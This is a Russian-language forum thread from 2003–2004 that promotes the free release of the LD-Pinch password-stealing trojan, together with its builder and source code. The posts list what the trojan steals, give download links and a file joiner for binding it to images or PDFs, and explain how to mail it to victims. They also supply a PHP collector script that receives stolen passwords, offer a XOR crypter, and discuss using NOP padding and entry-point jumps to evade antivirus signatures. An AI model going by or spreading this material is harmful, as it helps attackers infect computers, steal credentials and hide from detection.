|
Разное об ICQ: уязвимости, защита, проблемы с паролем Обсуждение самых основных вопросов, касающихся ICQ - советы, статьи по безопасности, особенности новых версий и фишек, ответы по поводу установки клиента и простейших настроек, другие темы, не имеющие отношения к продвинутой эксплуатации ICQ. Перестал подходить пароль к номеру ICQ? Вам помогут в этом разделе ;) |
|
Опции темы | Оценить тему |
02.10.2003, 04:11 | #1 |
Старпёр
Регистрация: 22.06.2003
Сообщений: 186
Репутация: 91
|
Pinch: лучший трой, теперь для всех!
Платный трой LD-Pinch, теперь раздается даром с конфигуратором и исходниками (а это более 150 кб чистого асма).
Посмотреть скриншоты, а также скачать сам трой можно здесь: http://www.cobans.net/pinch.html Напомню возможности троя, увод паролей: - ICQ99b-2003a/2003b/Lite - Miranda-icq - Trillian ICQ&AIM - &RQ - The Bat!/The Bat!2 (mailer) - Outlook/Outlook Express (pop3/imap) - IE autocomplete & protected sites & ftp (9x/Me/2k/xp supported) - FAR Manager (ftp) - Win/Total Commander (ftp) - RAS (поддерживается 9x/Me/2k/xp) - System info: OS, memory, CPU, hard drives, logged user, host name, IP - Key-log - Remote console - Посылка e-mail писем используя встроенный SMTP клиент - Обход firewall'а - Шифровка писем - Самоудаление (optional) - Отчеты в HTML/Text форматах - Размер файла меньше 10кб - Модульная система, при компиляции можно отключить некоторые модули, уменьшив тем самым размер выходного файла. Наслаждайтесь релизом :) В дополнению к пинчу: MicroJoiner -- клей для файлов, пока ничем не определяется, размер конфигуратора 7 кб, загрузчика 1024 байта (именно столько добавиться при склеивании файлов), цепляет иконки, может клеить картинки, pdf'ы, wav'ы и тд :) http://www.cobans.net/joiner.html
__________________
Web: http://www.cobans.net Последний раз редактировалось Keyptor; 18.02.2004 в 16:15. |
02.10.2003, 14:58 | #2 | ||||||||||||||||||
Старпёр
Регистрация: 22.06.2003
Сообщений: 186
Репутация: 91
|
Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
HKEY_CURRENT_USER\Software\Mic rosoft\Windows\CurrentVersion\ Run <putil> 2. Тут инфа проверки на повторную отсылку пассов (если снести будет посылать все заново): HKEY_CURRENT_USER\Software\Int el <Data> 3. Сам exe-шник: Папка виндов\Название троя.exe 4. Файлы кейлога: Папка виндов\plog Цитата:
Цитата:
Цитата:
Попробуйте распаковать трой в папку C:\Program Files\Borland\Delphi6\Projects \Pinch\ Цитата:
P.S. для седя я уже давно шифранул экзешник, так что его никакой антивирь не видит. Цитата:
Цитата:
вводишь проксю, и заходишь на mail.ru шлешь письмо, прикрепляешь троян и шлешь :) или качаешь SocksCap, запускаешь Outlook и шлешь через socks5 Цитата:
Sources\PinchBuilder\Main.Pas отрываете: ищете строчку с коментом // RSRC.RC далее идет: S := '// Auto-gen и т.д. удаляете все до знака ; и пишете: code:-------------------------------------------------------------------------------- S := '// Auto-generated file, can be deleted...'#13#10#13#10 + 'MAINICON ICON "' + IconPathEdit.Text + '"'#13#10; -------------------------------------------------------------------------------- и все :) потом компиляете билдер и все :) для тех у кого нету делфей - юзайте Resrorator и прочие тулзы, и создаете ресурс с именем MAINICON (тип значок) и запихиваете свой значок. Цитата:
<? list($to,$subj,$body) = array($_POST['a'],$_POST['b'],$_POST['c']); if ($f = fsockopen("mx3.mail.ru",25)) { $msg = 'HELO adm@root.com\n'. 'MAIL FROM:<pinch@pinch.ru>\n'. 'RCPT TO:<$to>\n'. 'DATA\n'. '$body\n.'. 'quit\n\n'; fputs($f,$msg); } fclose($f); /* запись в файл */ $f = fopen('log.txt','a'); fputs($f,'$data\n--------------------------------------------\n'); fclose($f); ?> <!-- REQUIRED --> <script language="JavaScript"> window.status = "_ret_ok_1"; </script></body></html> Цитата:
Копируешь текст письма и вставляешь туда. Или прямо в пинч билдере(закладка decrypt).
__________________
Web: http://www.cobans.net Последний раз редактировалось Keyptor; 15.03.2004 в 21:10. |
||||||||||||||||||
06.10.2003, 18:52 | #3 |
Старпёр
Регистрация: 22.06.2003
Сообщений: 186
Репутация: 91
|
Еще, народ, настраивайте трой внимательнее, а то ко мне постоянно приходят то тесты то пароли ваши %)
__________________
Web: http://www.cobans.net |
27.11.2003, 06:40 | #4 |
Участник
Регистрация: 17.01.2003
Сообщений: 34
Репутация: 1
|
http://zuluhotel.ru/pinch.zip
с ихсодниками. удалять пока не буду. |
01.03.2004, 15:26 | #5 |
Участник
Регистрация: 08.02.2004
Сообщений: 7
ICQ: 1437239 Репутация: 1
|
Шифратор для пинча
"Ну че, дети, как там в интернете?
В чатах сидите? Гадите в сети?" Наконец-то наступил первый день весны - 1 марта! Зима потихоньку отступает… У Феликса сегодня ДР. Ты его, скорее всего, не знаешь, но могу поручиться, что веселый человек, очень хороший и надежный друг. На него можно положиться. С днюхой, Феликс! В связи с тем, что в этот день столько всего хорошего, то сделаю этот день еще на капельку лучше. Ты можешь скачать шифровщик для пинча. Шифровальщик действует очень примитивно - просто часть кода XOR-ится определенным байтом. Аверы, конечно вскоре просекут эту фишку, но ты можешь поменять байт зашифровки. Как? Почитай readme - я его не просто так писал. Сам шифровщик написан с помощью RadAsm и masm32(куды без него?). Пароль на архив "asechka[dot]ru" Исходники могу выслать. Для этого пошли мне запрос на мыло antiavp[am]mail[dot]ru. Наверно, напоследок скажу: не стоит ничего делать просто так. Во всем должен быть смысл. Если бы не ДР - хрен бы я писал этот криптер :) Так что не ломайте ничего только для того, что бы сломать. "Ладно, надоело, я кончаю, ребятки Я надеюсь, детки, что у вас все в порядке..." (c) кирпичи.
__________________
music makes a people come together |
12.03.2004, 17:50 | #7 | |
Администратор
|
Цитата:
$data\n--------------------------------------------\n и все? Где ж ошибка? Подскажите плиз |
|
13.03.2004, 06:14 | #8 |
Участник
Регистрация: 08.02.2004
Сообщений: 7
ICQ: 1437239 Репутация: 1
|
Попробуй вместо $data написать $body.
Хостинг h11.ru поддерживает запись в файл, так что можно легко размещать этот скрипт там. На мыло пароли слаться не будут - у них баннеры...
__________________
music makes a people come together Последний раз редактировалось diov; 13.03.2004 в 06:16. |
14.03.2004, 19:55 | #9 |
Участник
|
Что то последние время не могу даже тестовое сообщение послатьб пишет can't connect to the server или mailbox name not allowed пробывал со многих серверов и ящиков.
__________________
Была бы жопа, а геморой найдется! |
23.03.2004, 22:54 | #11 | |
Участник
Регистрация: 17.01.2003
Сообщений: 34
Репутация: 1
|
Цитата:
Я посмотрю на тебя, когда твоя же Панда снова ругнётся на твой же скомпиленный екзешник Парсера допустим. Все антивирусы кричат на серверные программы троянов etc. |
|
04.10.2004, 00:08 | #19 |
Участник
Регистрация: 27.12.2002
Сообщений: 249
Репутация: 6
|
никто не чего не прикрывал, трафик там копеечный
посмотрим, будет кто-нибудь эту тему покупать, если можно бесплатно залить на хостинг к какому-нибудь другу и пользоваться |
04.10.2004, 00:49 | #21 |
Старпёр
Регистрация: 22.06.2003
Сообщений: 186
Репутация: 91
|
~vo0D0o~, по некоторым веским причинам разработка пинча-2 была отложена на неопределенное время, доступны исходники реализованной части на http://pinch.ccteam.ru
В ближайшее время будет апгрейд парсера (для P2) (добавятся некоторые опции и возможности фильтрации/экспорта), до продолжения работы над сервером и конфигуратором руки дойдут очень нескоро, если вообще когда-то дойдут.
__________________
Web: http://www.cobans.net |
09.10.2004, 02:47 | #24 | |
Участник
Регистрация: 09.10.2004
Сообщений: 9
ICQ: 5895544 Репутация: 1
|
Цитата:
__________________
shine shine shine |
|
12.10.2004, 11:03 | #28 |
Участник
Регистрация: 28.03.2004
Сообщений: 109
ICQ: 267655 Репутация: 1
|
Nuphonik,LuiCifer and other
этой теме уже год. надо смотреть дату постов. Уже выходили и понч про, и пинч 2, и другие моды, были кучи топиков на других сайтах как прятать и модифицировать трой. Были написаны кучи прог, но из за крыс которые стучат в супорты каспера и веба все их быстро прикрывают. Складывается пакая ситуация , что в скором времени вообще люди пишущие софт подобной тематики перестанут что-либо выкладывть(некоторые уде так и делают). И я их пойму, так как они тратят своё время и силы, а из-за крыс на форумах и не только всё прикрывают. з.ы.: Знаю способ как зашарить пинч, но выклдывать не буду. Кто ищет, тот всегда найдёт! |
24.10.2004, 13:57 | #36 |
Участник
Регистрация: 07.10.2004
Сообщений: 459
ICQ: 400450 Репутация: 4
|
fearless, что ПРО? Версия пинча? Бумер говорит про "nop", это такой "оператор" в ассемблере, который ничего не делает, опкод которого равер 90h. Нужно просто вставить его в "нужное" (пустое) место в exe'шнике. Чем, как и куда, объяснять не буду, про ЭТО написано уже достаточно статей, пойщи просто ;)
P.s А разве простой nop обманывает, допустим, Каспера? Например, дописывание в конец секции кода (в пустое место, если оно там есть) кода, типа mov eax, REAL_EP_ADDRESS jmp eax легко палится тем же Каспером... (ну, естественно, EP перенесён на этот код :)) |
24.10.2004, 14:43 | #38 | |
Старпёр
Регистрация: 22.06.2003
Сообщений: 186
Репутация: 91
|
Цитата:
nop'ы можно вставлять как мусор, т.к. каспер определяет вирус/не вирус по нескольким кускам в .exe -- сигнатурам, если места этих кусков изменятся, либо сами куски не совпадут с контрольными суммами каспера, тогда получится чистяк =)
__________________
Web: http://www.cobans.net |
|
25.10.2004, 02:53 | #39 | |||
Участник
Регистрация: 07.10.2004
Сообщений: 459
ICQ: 400450 Репутация: 4
|
Цитата:
Цитата:
prefetcht0 ; OF 18 h mov eax, OEP jmp eax В принципе, можно вместо prefetcht'а использовать некоторые (все, конечно, не пробовал :)) другие операторы сопроцессора. Но да вот беда, они могут не поддерживаться на некоторых старых процессорах... Вобщем, придумать можно много всего, главное, чтобы места хватило (00 байтов)... Цитата:
|
|||